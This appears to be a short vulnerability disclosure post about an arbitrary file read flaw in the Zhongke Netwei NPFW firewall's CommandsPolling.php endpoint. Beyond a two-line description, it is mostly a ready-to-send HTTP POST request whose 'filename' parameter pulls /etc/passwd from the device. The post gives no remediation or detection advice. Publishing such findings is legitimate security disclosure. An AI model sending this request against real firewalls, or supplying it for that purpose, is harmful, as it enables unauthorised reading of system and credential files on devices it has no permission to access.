Zhongke Netwei Npfw Firewall Commandspolling Php Arbitrary File Reading Vulnerability
Zhongke Netwei Npfw Firewall Commandspolling Php Arbitrary File Reading Vulnerability
Zhongke Netwei NPFW Firewall CommandsPolling.php Arbitrary file reading vulnerability
Vulnerability Description
Zhongke Netwei NPFW firewall has arbitrary file reading vulnerability. Due to insufficient code filtering, any file on the server can be read.
Vulnerability Impact
Zhongke Netwei NPFW Firewall
Network surveying and mapping
Vulnerability reappears
Login page
Send a request packet
1
2
3
4
5
6
7
8
9
10
11
12
13
POST /direct/polling/CommandsPolling.php HTTP/1.1
Host:
Cookie: PHPSESSID=014d2705856e1df139772db42ccbaf9f
Content-Length: 47
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close
command=ping&filename=%2Fetc%2Fpasswd&cmdParam=
This post is licensed under CC BY 4.0 by the author.